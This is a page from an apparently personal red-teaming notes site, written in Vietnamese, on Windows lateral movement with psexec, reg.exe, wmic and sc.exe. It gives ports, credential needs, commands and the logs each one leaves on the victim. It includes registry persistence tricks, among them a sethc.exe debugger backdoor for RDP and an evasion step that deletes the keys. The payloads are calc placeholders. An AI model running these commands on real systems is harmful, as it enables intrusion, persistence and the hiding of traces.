🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  • psexec.exe
  • reg.exe
  • wmic.exe
  • sc.exe
  1. Red Teaming
  2. Lateral Movement
  3. Lateral Movement 101

Windows component

PreviousImpacketNextXS Leak

Last updated 16 days ago

psexec.exe

Port

135, 445, 4915x/TCP

Credentials

Cleartext

Share

Cần writable share

Sử dụng cơ bản

PsExec.exe -u doamin\user -p password \\IP -i cmd

Kết quả

Ở máy victim ta sẽ thấy file PSEXESVC được tạo ở ADMIN$ share (lí do vì sao cần writeable share)

Ta sẽ thấy exe này được thực thi qua service để handle remote cmd

Khi exit session thì file PSEXESVC.exe và service PSEXESVC bị xóa

reg.exe

Port

445

Credentials

Cleartext

Share

Không cần

Đầu tiên ta cần chạy runas với creden của victim

runas /user:domain\user cmd

Câu lệnh sẽ spawn cmd mới, ta sẽ remote set reg với cmd mới này

Remote set startup program

reg.exe add \\IP\HKLM\software\microsoft\windows\currentversion\run /v testprog /t REG_SZ /d "calc"

Remote set program launch handler

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t reg_sz /d "calc"

Backdoor in RDP

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "calc"

Evasion

reg.exe delete \\IP\HKLM\... /v <key_nhame> /f

wmic.exe

Port

135, 4915x/TCP

Credentials

Cleartext

Share

Không cần

Sử dụng cơ bản

wmic.exe /user:domain\user /password:password /node:IP process call create 'calc'

Tại log Sysmon ta sẽ thấy calc.exe được spawn bởi WmiPrvSE.exe

sc.exe

Port

135, 4915x/TCP

Credentials

Cleartext

Share

Không cần

Sử dụng cơ bản

sc.exe \\IP create serviceName binPath= "cmd /c calc" start= auto
sc.exe \\IP start serviceName

Tạo service từ xa và kích hoạt để thực thi cmd. Tại victim ta sẽ thấy logs tạo service

🥷